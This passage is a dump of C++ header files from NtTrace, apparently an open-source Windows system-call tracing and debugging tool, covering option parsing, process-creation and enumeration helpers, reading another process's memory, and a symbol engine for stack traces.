 64 |  *       return 1;
 65 |  *   for ( Options::const_iterator it = opts.begin();
 66 |  *         it != opts.end(); ++it )
 67 |  *   { // do something with *it }
 68 |  *
69 | * This example code will successfully cope with command lines like this:
    70 | *
  • program.exe
    71 | * [no flags set, no iterations round the loop] 72 | *
  • program.exe -b -i 42 fred joe bill
    73 | * [boolValue set to true, intValue set to 42, 3 iterations round the loop] 74 | *
  • program.exe -i 12 -- -i -j
    75 | * [intValue set to true, 2 iterations round the loop] 76 | *
  • program.exe -h
    77 | * This prints: 78 | *
    Syntax: program.exe [-b] [-i #]
 79 |  *
 80 |  *  Options:
 81 |  *    -b batch mode
 82 |  *    -i number of repeats
 83 |  *
 84 |  *  This program does something
    85 | *
86 | */ 87 | class Options 88 | { 89 | public: 90 | /** 91 | * Construct from rcs ID - for version info. 92 | * 93 | * The supplied string is automatically printed when the -ver option is used. 94 | */ 95 | Options( char const * pRcsId ); 96 | 97 | /** Destructor */ 98 | ~Options(); 99 | 100 | /** Set a 'bool' option */ 101 | void set( std::string const & option, bool * pValue, std::string const & helpString = "" ); 102 | 103 | /** Set an 'int' option */ 104 | void set( std::string const & option, int * pValue, std::string const & helpString = "" ); 105 | 106 | /** Set an 'unsigned int' option */ 107 | void set( std::string const & option, unsigned int * pValue, std::string const & helpString = "" ); 108 | 109 | /** Set a 'long' option */ 110 | void set( std::string const & option, long * pValue, std::string const & helpString = "" ); 111 | 112 | /** Set an 'unsigned long' option */ 113 | void set( std::string const & option, unsigned long * pValue, std::string const & helpString = "" ); 114 | 115 | /** Set an 'double' option */ 116 | void set( std::string const & option, double * pValue, std::string const & helpString = "" ); 117 | 118 | /** Set a 'string' option */ 119 | void set( std::string const & option, std::string * pValue, std::string const & helpString = ""); 120 | 121 | /** Set argument count (-1 => any number) */ 122 | void setArgs( int argCount, std::string const & helpString = "" ); 123 | 124 | /** Set argument count - min and max (-1 => any number) */ 125 | void setArgs( int argCountMin, int argCountMax, std::string const & helpString = "" ); 126 | 127 | /** Process the command line arguments, return false on bad argument or 'help' */ 128 | bool process( int argc, char ** argv, std::string const & usage = "" ); 129 | 130 | /** Get program name */ 131 | std::string pname() const; 132 | 133 | /** Iterator type returned by begin/end */ 134 | typedef std::vector::const_iterator const_iterator; 135 | 136 | /** Start of non-option arguments */ 137 | const_iterator begin() const; 138 | 139 | /** End of non-option arguments */ 140 | const_iterator end() const; 141 | 142 | private: 143 | // no copy/assign 144 | Options( Options const & ); 145 | Options & operator=( Options const & ); 146 | 147 | struct Data; 148 | Data * pData; 149 | }; 150 | 151 | } 152 | 153 | // include the implementation 154 | #include "Options.inl" 155 | 156 | #endif // OPTIONS_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/ProcessHelper.h: -------------------------------------------------------------------------------- 1 | #ifndef ProcessHelper_H_ 2 | #define ProcessHelper_H_ 3 | 4 | /** 5 | @file 6 | Helper functions for process management. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2003 11 | 12 | This software is distributed in the hope that it will be useful, but 13 | without WITHOUT ANY WARRANTY; without even the implied warranty of 14 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 15 | 16 | Permission is granted to anyone to make or distribute verbatim 17 | copies of this software provided that the copyright notice and 18 | this permission notice are preserved, and that the distributor 19 | grants the recipient permission for further distribution as permitted 20 | by this notice. 21 | 22 | Comments and suggestions are always welcome. 23 | Please report bugs to rogero@howzatt.demon.co.uk. 24 | 25 | $Revision: 1405 $ 26 | */ 27 | 28 | // $Id: ProcessHelper.h 1405 2013-11-12 23:57:17Z Roger $ 29 | 30 | 31 | #pragma warning( disable: 4786 ) 32 | 33 | #include // for CreateProcess 34 | #include // for EnumProcesses 35 | #include // for tolower 36 | #include // for transform 37 | #include 38 | #include 39 | #include 40 | 41 | #include "Options.h" 42 | #include "readInt.h" 43 | 44 | namespace or2 45 | { 46 | 47 | ////////////////////////////////////////////////////////////////////////// 48 | /** Wrapper for create process. 49 | * 50 | * @return 51 | * - 0 on success 52 | * - non-zero on failure, and GetLastError() can be used 53 | */ 54 | 55 | inline 56 | int CreateProcessHelper( 57 | Options::const_iterator it, ///< first string is command 58 | Options::const_iterator end, ///< rest of iteration are arguments 59 | DWORD create_options = 0, ///< options for CreateProcess 60 | PROCESS_INFORMATION* pProcessInformation = 0 ) ///< returned process information on success 61 | { 62 | std::string executable = *it; 63 | 64 | // Search for possible executable matching the program name 65 | char szFullName[ MAX_PATH ]; 66 | if ( 0 != SearchPath( NULL, executable.c_str(), ".exe", sizeof( szFullName ), szFullName, 0 ) ) 67 | executable = szFullName; 68 | 69 | std::string cmdLine; 70 | for ( ; it != end; ++it ) 71 | { 72 | std::string curr( *it ); 73 | 74 | if ( cmdLine.length() ) 75 | cmdLine += " "; 76 | 77 | if ( curr.find( ' ' ) != std::string::npos ) 78 | { 79 | cmdLine += '"'; 80 | cmdLine += curr; 81 | cmdLine += '"'; 82 | } 83 | else 84 | { 85 | cmdLine += curr; 86 | } 87 | } 88 | 89 | STARTUPINFO startupInfo = { sizeof( startupInfo ) }; 90 | startupInfo.dwFlags = STARTF_USESHOWWINDOW; 91 | startupInfo.wShowWindow = SW_SHOWNORMAL; // Assist GUI programs 92 | PROCESS_INFORMATION ProcessInformation; 93 | 94 | if ( ! CreateProcess( 95 | const_cast(executable.c_str()), // name of executable module 96 | const_cast(cmdLine.c_str()), // command line string 97 | 0, // SD 98 | 0, // SD 99 | true, // handle inheritance option 100 | create_options, // creation flags 101 | 0, // new environment block 102 | 0, // current directory name 103 | &startupInfo, // startup information 104 | &ProcessInformation // process information 105 | ) ) 106 | { 107 | return 1; 108 | } 109 | 110 | if ( pProcessInformation ) 111 | *pProcessInformation = ProcessInformation; 112 | else 113 | { 114 | CloseHandle( ProcessInformation.hProcess ); 115 | CloseHandle( ProcessInformation.hThread ); 116 | } 117 | 118 | return 0; 119 | } 120 | 121 | ////////////////////////////////////////////////////////////////////////// 122 | /** Wrapper for create process as user. 123 | * 124 | * @return 125 | * - 0 on success 126 | * - non-zero on failure, and GetLastError() can be used 127 | */ 128 | 129 | inline 130 | int CreateProcessAsUserHelper( 131 | HANDLE hToken, ///< security token to use for target process 132 | Options::const_iterator it, ///< first string is command 133 | Options::const_iterator end, ///< rest of iteration are arguments 134 | DWORD create_options = 0, ///< options for CreateProcess 135 | PROCESS_INFORMATION* pProcessInformation = 0 ) ///< returned process information on success 136 | { 137 | std::string executable = *it; 138 | 139 | // Search for possible executable matching the program name 140 | char szFullName[ MAX_PATH ]; 141 | if ( 0 != SearchPath( NULL, executable.c_str(), ".exe", sizeof( szFullName ), szFullName, 0 ) ) 142 | executable = szFullName; 143 | 144 | std::string cmdLine; 145 | for ( ; it != end; ++it ) 146 | { 147 | std::string curr( *it ); 148 | 149 | if ( cmdLine.length() ) 150 | cmdLine += " "; 151 | 152 | if ( curr.find( ' ' ) != std::string::npos ) 153 | { 154 | cmdLine += '"'; 155 | cmdLine += curr; 156 | cmdLine += '"'; 157 | } 158 | else 159 | { 160 | cmdLine += curr; 161 | } 162 | } 163 | 164 | STARTUPINFO startupInfo = { sizeof( startupInfo ) }; 165 | startupInfo.dwFlags = STARTF_USESHOWWINDOW; 166 | startupInfo.wShowWindow = SW_SHOWNORMAL; // Assist GUI programs 167 | PROCESS_INFORMATION ProcessInformation; 168 | 169 | if ( ! CreateProcessAsUser( 170 | hToken, 171 | const_cast(executable.c_str()), // name of executable module 172 | const_cast(cmdLine.c_str()), // command line string 173 | 0, // SD 174 | 0, // SD 175 | true, // handle inheritance option 176 | create_options, // creation flags 177 | 0, // new environment block 178 | 0, // current directory name 179 | &startupInfo, // startup information 180 | &ProcessInformation // process information 181 | ) ) 182 | { 183 | return 1; 184 | } 185 | 186 | if ( pProcessInformation ) 187 | *pProcessInformation = ProcessInformation; 188 | else 189 | { 190 | CloseHandle( ProcessInformation.hProcess ); 191 | CloseHandle( ProcessInformation.hThread ); 192 | } 193 | 194 | return 0; 195 | } 196 | 197 | ////////////////////////////////////////////////////////// 198 | /** Returns all process IDs matching 'pattern'. 199 | * 200 | * @return a vector of all matching process IDs 201 | */ 202 | inline 203 | std::vector< DWORD > FindProcesses( const char *pattern = 0 ///< pattern to match for process name 204 | ) 205 | { 206 | std::vector< DWORD > ret; 207 | 208 | int pid(0); 209 | 210 | if ( ( pattern != 0 ) && ( readInt(pattern, pid ) ) ) 211 | { 212 | ret.push_back( (DWORD)pid ); 213 | return ret; 214 | } 215 | 216 | DWORD aProcesses[1024]; 217 | DWORD cbNeeded; 218 | 219 | if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) ) 220 | return ret; 221 | 222 | // Calculate how many process identifiers were returned. 223 | DWORD const cProcesses = cbNeeded / sizeof(DWORD); 224 | 225 | std::string lowerPattern( pattern == 0 ? "" : pattern ); 226 | std::transform( lowerPattern.begin(), lowerPattern.end(), lowerPattern.begin(), tolower ); 227 | 228 | for ( unsigned int iProcess = 0; iProcess < cProcesses; iProcess++ ) 229 | { 230 | DWORD const processID( aProcesses[iProcess] ); 231 | 232 | // Open the process to query the main module name 233 | 234 | if ( HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | 235 | PROCESS_VM_READ, 236 | FALSE, processID ) ) 237 | { 238 | char szModName[MAX_PATH]; 239 | 240 | // Get the full path to the module's file. 241 | 242 | if ( GetModuleBaseName( hProcess, 0, szModName, sizeof( szModName ) ) 243 | #ifdef GetProcessImageFileName 244 | || GetProcessImageFileName(hProcess, szModName, sizeof( szModName ) ) 245 | #endif // GetProcessImageFileName 246 | ) 247 | { 248 | std::string lower( szModName ); 249 | std::transform( lower.begin(), lower.end(), lower.begin(), tolower ); 250 | if ( ( lowerPattern.length() == 0 ) || ( lower.find( lowerPattern ) != std::string::npos ) ) 251 | { 252 | // Return the process identifier. 253 | ret.push_back( processID ); 254 | } 255 | } 256 | 257 | CloseHandle( hProcess ); 258 | } 259 | } 260 | 261 | return ret; 262 | } 263 | 264 | } 265 | 266 | #endif // ProcessHelper_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/ReadInt.h: -------------------------------------------------------------------------------- 1 | #ifndef readInt_h_ 2 | #define readInt_h_ 3 | 4 | /** 5 | @file 6 | Helper function for reading a string into an integer. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2004 11 | 12 | This software is distributed in the hope that it will be useful, but 13 | without WITHOUT ANY WARRANTY; without even the implied warranty of 14 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 15 | 16 | Permission is granted to anyone to make or distribute verbatim 17 | copies of this software provided that the copyright notice and 18 | this permission notice are preserved, and that the distributor 19 | grants the recipient permission for further distribution as permitted 20 | by this notice. 21 | 22 | Comments and suggestions are always welcome. 23 | Please report bugs to rogero@howzatt.demon.co.uk. 24 | 25 | $Revision: 1405 $ 26 | */ 27 | 28 | // $Id: ReadInt.h 1405 2013-11-12 23:57:17Z Roger $ 29 | 30 | #include // for string 31 | #include // for strtol 32 | 33 | namespace or2 34 | { 35 | 36 | /** Convert a string into an integer. 37 | * 38 | * Allows string to start with 0x to imply hexadecimal values. 39 | * 40 | * @return 41 | * - true on successful conversion 42 | * - false on failure 43 | */ 44 | inline 45 | bool readInt( 46 | std::string const & value, ///< value to convert 47 | int & result ) ///< returned result if successful conversion, otherwise partial result 48 | { 49 | char *delim = 0; 50 | 51 | if ( ( value.length() >= 2 ) && 52 | ( value[0] == '0' ) && 53 | ( value[1] == 'x' || value[1] == 'X' ) ) 54 | { 55 | result = strtoul( value.c_str() + 2, &delim, 16 ); 56 | } 57 | else 58 | { 59 | result = strtol( value.c_str(), &delim, 10 ); 60 | } 61 | 62 | return *delim == '\0'; 63 | } 64 | 65 | /** Convert a string into an unsigned integer. 66 | * 67 | * Allows string to start with 0x to imply hexadecimal values. 68 | * 69 | * @return 70 | * - true on successful conversion 71 | * - false on failure 72 | */ 73 | inline 74 | bool readInt( 75 | std::string const & value, ///< value to convert 76 | unsigned int & result ) ///< returned result if successful conversion, otherwise partial result 77 | { 78 | char *delim = 0; 79 | 80 | if ( ( value.length() >= 2 ) && 81 | ( value[0] == '0' ) && 82 | ( value[1] == 'x' || value[1] == 'X' ) ) 83 | { 84 | result = strtoul( value.c_str() + 2, &delim, 16 ); 85 | } 86 | else 87 | { 88 | result = strtoul( value.c_str(), &delim, 10 ); 89 | } 90 | 91 | return *delim == '\0'; 92 | } 93 | 94 | #if _MSC_VER >= 1500 95 | /** Convert a string into a long long integer. 96 | * 97 | * Allows string to start with 0x to imply hexadecimal values. 98 | * 99 | * @return 100 | * - true on successful conversion 101 | * - false on failure 102 | */ 103 | inline 104 | bool readInt( 105 | std::string const & value, ///< value to convert 106 | LONGLONG & result ) ///< returned result if successful conversion, otherwise partial result 107 | { 108 | char *delim = 0; 109 | 110 | if ( ( value.length() >= 2 ) && 111 | ( value[0] == '0' ) && 112 | ( value[1] == 'x' || value[1] == 'X' ) ) 113 | { 114 | result = _strtoi64( value.c_str() + 2, &delim, 16 ); 115 | } 116 | else 117 | { 118 | result = _strtoi64( value.c_str(), &delim, 10 ); 119 | } 120 | 121 | return *delim == '\0'; 122 | } 123 | #endif // _MSC_VER >= 1500 124 | 125 | } 126 | 127 | #endif // readInt_h_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/ReadPartialMemory.h: -------------------------------------------------------------------------------- 1 | #ifndef READPARTIALMEMORY_H_ 2 | #define READPARTIALMEMORY_H_ 3 | 4 | /**@file 5 | 6 | Function to read partial memory buffer from a target process 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2011. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: ReadPartialMemory.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | #include 30 | 31 | namespace or2 32 | { 33 | /** 34 | * Reads data from an area of memory in a specified process. 35 | * 36 | * The area to be read need only be partially accessible. 37 | * The function reads the largest contiguous amount of data from 'address' and 38 | * succeeds if this length is in [minSize, maxSize]. 39 | * 40 | * @return the number of bytes read. Zero implies failure - use GetLastError() for details 41 | */ 42 | inline 43 | SIZE_T ReadPartialProcessMemory( 44 | HANDLE hProcess, ///< Handle to process to read (needs PROCESS_VM_READ access) 45 | LPCVOID address, ///< Base address of area to read 46 | LPVOID buffer, ///< Buffer to hold read data 47 | SIZE_T minSize, ///< Minimum amount to read for success 48 | SIZE_T maxSize) ///< Maximum size of buffer 49 | { 50 | SIZE_T length = maxSize; 51 | while (length >= minSize) 52 | { 53 | if ( ReadProcessMemory(hProcess, address, buffer, length, 0) ) 54 | { 55 | return length; 56 | } 57 | length--; 58 | 59 | static SYSTEM_INFO SystemInfo; 60 | static BOOL b = (GetSystemInfo(&SystemInfo), TRUE); 61 | 62 | SIZE_T pageOffset = ((ULONG_PTR)address + length) % SystemInfo.dwPageSize; 63 | if (pageOffset > length) 64 | break; 65 | length -= pageOffset; 66 | } 67 | return 0; 68 | } 69 | 70 | 71 | } // namespace 72 | 73 | #endif // READPARTIALMEMORY_H_ 74 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/ShowData.h: -------------------------------------------------------------------------------- 1 | #ifndef SHOWDATA_H_ 2 | #define SHOWDATA_H_ 3 | 4 | /**@file 5 | 6 | Functions to handle showing data from another process 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2002, 2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | #include 28 | #include 29 | 30 | // or2 includes 31 | #include // For Nt native data types 32 | 33 | /** namespace for functions showing data from another process */ 34 | namespace showData 35 | { 36 | /** show a DWORD from the debuggee */ 37 | void showDword( std::ostream & os, ULONG_PTR value ); 38 | 39 | /** show a BOOL from the debuggee */ 40 | void showBoolean( std::ostream & os, BOOLEAN value ); 41 | 42 | /** Show an enumeration name, if available */ 43 | void showEnum(std::ostream & os, ULONG_PTR value, std::string const & enumName); 44 | 45 | /** Show an mask enumeration name, if available */ 46 | void showMask(std::ostream & os, ULONG_PTR value, std::string const & enumName); 47 | 48 | /** show an HRESULT from the debuggee */ 49 | void showWinError( std::ostream & os, HRESULT hResult ); 50 | 51 | /** show an image name from the debuggee (in ANSI or Unicode) */ 52 | bool showName( std::ostream & os, HANDLE hProcess, LPVOID lpImageName, bool bUnicode ); 53 | 54 | /** 55 | * Show a string from the debuggee (in ANSI or Unicode) 56 | * @return true if ends with a newline, false if not 57 | */ 58 | bool showString( std::ostream & os, HANDLE hProcess, LPVOID lpString, bool bUnicode, WORD nStringLength ); 59 | 60 | /** show Object Attrributes from the debuggee */ 61 | void showObjectAttributes( std::ostream & os, HANDLE hProcess, LPVOID pvoid ); 62 | 63 | /** show an Unicode string from the debuggee */ 64 | void showUnicodeString( std::ostream & os, HANDLE hProcess, PUNICODE_STRING pTargetUnicodeString ); 65 | 66 | /** show a generic pointer from the debuggee */ 67 | void showPointer( std::ostream & os, HANDLE hProcess, ULONG_PTR argVal ); 68 | 69 | /** show a pointer to handle from the debuggee */ 70 | void showPHandle( std::ostream & os, HANDLE hProcess, ULONG_PTR argVal ); 71 | 72 | /** show a pointer to USHORT from the debuggee */ 73 | void showPUshort( std::ostream & os, HANDLE hProcess, ULONG_PTR argVal ); 74 | 75 | /** show a pointer to ULONG from the debuggee */ 76 | void showPUlong( std::ostream & os, HANDLE hProcess, ULONG_PTR argVal ); 77 | 78 | /** show an access mask from the debuggee */ 79 | void showAccessMask( std::ostream & os, HANDLE hProcess, ULONG_PTR argVal ); 80 | 81 | /** show a client ID from the debuggee */ 82 | void showPClientId( std::ostream & os, HANDLE hProcess, PCLIENT_ID pClientId ); 83 | 84 | /** show an OP status block from the debuggee */ 85 | void showPIoStatus( std::ostream & os, HANDLE hProcess, PIO_STATUS_BLOCK pIoStatusBlock ); 86 | 87 | /** show a large integer from the debuggee */ 88 | void showPLargeInteger( std::ostream & os, HANDLE hProcess, PLARGE_INTEGER pLargeInteger ); 89 | 90 | /** Display an LPC message */ 91 | void showPLpcMessage(std::ostream & os, HANDLE hProcess, PLPC_MESSAGE pLpcMessage); 92 | 93 | /** show file attributes from the debuggee */ 94 | void showFileAttributes( std::ostream & os, ULONG argVal ); 95 | 96 | /** show file basic information from the debuggee */ 97 | void showPFileBasicInfo( std::ostream & os, HANDLE hProcess, PFILE_BASIC_INFORMATION pFileBasicInfo ); 98 | 99 | /** show network open information from the debuggee */ 100 | void showPFileNetworkInfo( std::ostream & os, HANDLE hProcess, PFILE_NETWORK_OPEN_INFORMATION pFileNetworkInfo ); 101 | 102 | /** Convert msvc throw information into a type name */ 103 | void showThrowType( std::ostream & os, HANDLE hProcess, ULONG_PTR throwInfo, ULONG_PTR base ); 104 | } 105 | 106 | #endif // SHOWDATA_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/SimpleTokenizer.h: -------------------------------------------------------------------------------- 1 | #ifndef SimpleTokenizer_h_ 2 | #define SimpleTokenizer_h_ 3 | 4 | /** 5 | @file 6 | Turn a string delimited by a given character into a vector of strings. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | #include 28 | #include 29 | 30 | namespace or2 31 | { 32 | 33 | //////////////////////////////////////////////////////////////// 34 | /** Turn a string delimited by a given character into a vector of strings. 35 | * 36 | * EXAMPLE
37 |  *    \#include "SimpleTokenizer.h"
38 |  *    ...
39 |  *    std::vector\< std::string \> sv;
40 |  *
41 |  *    SimpleTokenizer( "This is a test", &sv, ' ' );
42 |  *
43 |  *    std::copy( sv.begin(), sv.end(),
44 |  *        std::ostream_iterator( std::cout, "\n" ) );
45 |  *
46 | * 47 | */ 48 | inline 49 | void SimpleTokenizer( 50 | std::string const & str, ///< string to tokenize 51 | std::vector< std::string > * pTokens, ///< vector to populate 52 | char delim = ',' ) ///< delimiter for strings 53 | { 54 | std::string::size_type pos = 0; 55 | std::string::size_type len = str.size(); 56 | 57 | while ( pos < len ) 58 | { 59 | std::string::size_type nextpos = str.find( delim, pos ); 60 | 61 | if ( nextpos == std::string::npos ) 62 | nextpos = len; 63 | pTokens->push_back( str.substr(pos, nextpos - pos ) ); 64 | pos = nextpos+1; 65 | } 66 | } 67 | 68 | } 69 | 70 | #endif // SimpleTokenizer_h_ 71 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/StrFromWchar.h: -------------------------------------------------------------------------------- 1 | #ifndef STRFROMWCHAR_H_ 2 | #define STRFROMWCHAR_H_ 3 | 4 | /**@file 5 | 6 | Function to create a std::string from a wide string. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2005. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: StrFromWchar.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | #include 30 | #include 31 | 32 | #pragma warning( push ) 33 | #pragma warning( disable: 4996 ) // 'wcstombs' was declared deprecated 34 | 35 | namespace or2 36 | { 37 | 38 | /////////////////////////////////////////////////////////////////////////////// 39 | /** 40 | * Convert wide string to MB string 41 | * @param wString the (NUL terminated) wide character array to convert 42 | * @return a MBCS string 43 | */ 44 | inline 45 | std::string strFromWchar( wchar_t const * const wString ) 46 | { 47 | size_t const len = wcslen( wString ) + 1; 48 | size_t const nBytes = len * sizeof( wchar_t ); 49 | std::vector chArray( nBytes ); 50 | wcstombs( &chArray[0], wString, nBytes ); 51 | return std::string( &chArray[0] ); 52 | } 53 | 54 | /////////////////////////////////////////////////////////////////////////////// 55 | /** 56 | * Convert MB string to wide string 57 | * @param mbString the (NUL terminated) multi byte wide character array to convert 58 | * @return a wide string 59 | */ 60 | inline 61 | std::wstring wstrFromMBchar( char const * const mbString ) 62 | { 63 | size_t const len = strlen( mbString ) + 1; 64 | std::vector chArray( len ); 65 | mbstowcs( &chArray[0], mbString, len ); 66 | return std::wstring( &chArray[0] ); 67 | } 68 | 69 | } 70 | 71 | #pragma warning( pop ) 72 | 73 | #endif // STRFROMWCHAR_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/SymTagEnum.h: -------------------------------------------------------------------------------- 1 | #ifndef SYMTAGENUM_H_ 2 | #define SYMTAGENUM_H_ 3 | 4 | // $Id: SymTagEnum.h 5 2006-09-18 21:13:00Z Roger $ 5 | 6 | /** Enumeration extracted from DbgHelp.h in Debugging Tools for Windows SDK */ 7 | enum SymTagEnum 8 | { 9 | SymTagNull, 10 | SymTagExe, 11 | SymTagCompiland, 12 | SymTagCompilandDetails, 13 | SymTagCompilandEnv, 14 | SymTagFunction, 15 | SymTagBlock, 16 | SymTagData, 17 | SymTagAnnotation, 18 | SymTagLabel, 19 | SymTagPublicSymbol, 20 | SymTagUDT, 21 | SymTagEnum, 22 | SymTagFunctionType, 23 | SymTagPointerType, 24 | SymTagArrayType, 25 | SymTagBaseType, 26 | SymTagTypedef, 27 | SymTagBaseClass, 28 | SymTagFriend, 29 | SymTagFunctionArgType, 30 | SymTagFuncDebugStart, 31 | SymTagFuncDebugEnd, 32 | SymTagUsingNamespace, 33 | SymTagVTableShape, 34 | SymTagVTable, 35 | SymTagCustom, 36 | SymTagThunk, 37 | SymTagCustomType, 38 | SymTagManagedType, 39 | SymTagDimension, 40 | SymTagMax 41 | }; 42 | 43 | #endif // SYMTAGENUM_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/SymbolEngine.h: -------------------------------------------------------------------------------- 1 | #ifndef OR2_SYMBOLENGINE_H 2 | #define OR2_SYMBOLENGINE_H 3 | 4 | /**@file 5 | 6 | Wrapper for DbgHelper to provide common utility functions for processing 7 | Microsoft PDB information. 8 | 9 | @author Roger Orr 10 | 11 | Copyright © 2003. 12 | This software is distributed in the hope that it will be useful, but 13 | without WITHOUT ANY WARRANTY; without even the implied warranty of 14 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 15 | 16 | Permission is granted to anyone to make or distribute verbatim 17 | copies of this software provided that the copyright notice and 18 | this permission notice are preserved, and that the distributor 19 | grants the recipient permission for further distribution as permitted 20 | by this notice. 21 | 22 | Comments and suggestions are always welcome. 23 | Please report bugs to rogero@howzatt.demon.co.uk. 24 | 25 | $Revision: 1405 $ 26 | */ 27 | 28 | // $Id: SymbolEngine.h 1405 2013-11-12 23:57:17Z Roger $ 29 | 30 | #include 31 | #include 32 | 33 | #include "..\include\DbgHelper.h" 34 | 35 | namespace or2 36 | { 37 | 38 | /** Symbol Engine wrapper to assist with processing PDB information */ 39 | class SymbolEngine : public DbgHelper 40 | { 41 | public: 42 | /** Construct wrapper for specified process */ 43 | SymbolEngine( HANDLE hPRocess ); 44 | 45 | /** Destroy wrapper */ 46 | ~SymbolEngine( ); 47 | 48 | /** Print address to a stream, return true if information cacheable */ 49 | bool printAddress( PVOID address, std::ostream& os ) const; 50 | 51 | /** Convert address to a string */ 52 | std::string addressToName( PVOID address ) const; 53 | 54 | /** Provide a stack trace for the 'origContext' using current depth and params */ 55 | void StackTrace( HANDLE hThread, const CONTEXT & origContext, std::ostream & os ) const; 56 | 57 | /** get context for the current thread, correcting the stack frame to the caller */ 58 | #ifdef _M_IX86 59 | static BOOL GetCurrentThreadContext( CONTEXT * pContext ); 60 | #else 61 | static void (WINAPI *GetCurrentThreadContext)(PCONTEXT pContext); 62 | 63 | #endif // _M_IX86 64 | 65 | /** Provide an stack trace of the structured exception records starting at 'ExceptionList' using current seh depth */ 66 | void SEHTrace( PVOID ExceptionList, std::ostream& os ) const; 67 | 68 | /** Set true to show line numbers if possible */ 69 | void setLines( bool value ); 70 | /** Get whether line numbers are being shown if possible */ 71 | bool getLines() const; 72 | 73 | /** Set true to show parameters */ 74 | void setParams( bool value ); 75 | /** Get whether to show parameters */ 76 | bool getParams() const; 77 | 78 | /** Set true to show variables */ 79 | void setVariables( bool value ); 80 | /** Get whether to show variables */ 81 | bool getVariables() const; 82 | 83 | /** Set stack depth for walkbacks */ 84 | void setMaxDepth( int value ); 85 | /** Get stack depth for walkbacks */ 86 | int getMaxDepth() const; 87 | 88 | /** Set skip count for stack walkbacks */ 89 | void setSkipCount( int value ); 90 | /** Get skip count for stack walkbacks */ 91 | int getSkipCount() const; 92 | 93 | /** Set SEH stack depth for walkbacks */ 94 | void setSehDepth( int value ); 95 | /** Get SEH stack depth for walkbacks */ 96 | int getSehDepth() const; 97 | 98 | /** Hack to try and get first catch handler for MSVC exception */ 99 | bool findMsvcCppHandler( PVOID sehHandler, PVOID *msvcHandler ) const; 100 | 101 | /** Attempt to find type information for MSVC C++ throw parameter */ 102 | void showMsvcThrow( std::ostream &ofs, PVOID throwInfo, PVOID base ) const; 103 | 104 | /** ReadMemory from the target process */ 105 | bool ReadMemory( 106 | LPCVOID lpBaseAddress, // base of memory area 107 | LPVOID lpBuffer, // data buffer 108 | SIZE_T nSize ) const; // number of bytes to read 109 | 110 | /** decorate name for a symbol with the full data type */ 111 | BOOL decorateName( std::string & name, ULONG64 ModBase, ULONG TypeIndex ) const; 112 | 113 | /** call back interface for enumerating locals */ 114 | class EnumLocalCallBack 115 | { 116 | public: 117 | /** callback function called for each enumerated local */ 118 | virtual bool operator()( SymbolEngine const & eng, struct _SYMBOL_INFO* pSymInfo ) = 0; 119 | }; 120 | 121 | /** enumerate local variables at an address */ 122 | BOOL enumLocalVariables( DWORD64 codeOffset, DWORD64 frameOffset, EnumLocalCallBack & cb ) const; 123 | 124 | /** Write a simple mini-dump for an exception in the current thread */ 125 | BOOL dumpSelf( std::string const & miniDumpFile, EXCEPTION_POINTERS *ExceptionInfo ); 126 | 127 | /** Read a string from the target */ 128 | std::string getString(PVOID address, BOOL unicode, DWORD maxStringLength) const; 129 | 130 | /** Returns whether address points to executable code */ 131 | bool isExecutable( DWORD64 address ) const; 132 | 133 | private: 134 | SymbolEngine( SymbolEngine const 